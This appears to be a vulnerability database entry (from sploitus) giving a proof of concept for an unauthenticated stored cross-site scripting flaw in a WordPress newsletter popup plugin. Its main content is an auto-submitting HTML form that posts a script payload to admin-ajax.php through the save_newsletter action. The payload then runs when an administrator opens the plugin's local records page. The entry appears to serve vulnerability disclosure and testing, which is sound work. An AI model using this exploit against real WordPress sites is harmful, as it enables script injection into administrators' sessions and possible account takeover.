Share
## https://sploitus.com/exploit?id=WPEX-ID:F4047F1E-D5EA-425F-8DEF-76DD5E6A497E
1. Make sure there is a newsletter configured with the setting "Email Service > Save to local database"
2. When not logged in, use an HTML file where `<NL_ID>` is a valid newsletter ID:

```
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin-ajax.php" method="post">
        <input type="hidden" name="action" value="save_newsletter">
        <input type="hidden" name="nl_id" value="<NL_ID>">
        <input type="hidden" name="nl_name" value="Unauthenicated">
        <input type="hidden" name="nl_data" value='EMAIL%3Dtestemail%2540email.com%26NAME%3D"><script>alert(1234)</script>TIME%3D2024-03-15%252009%253A24%253A36'>
        <input type="submit" value="Submit Request">
</body>

```
3. Go to "Newsletter Popup > Local Record"
4. Select "Show Record" and see the XSS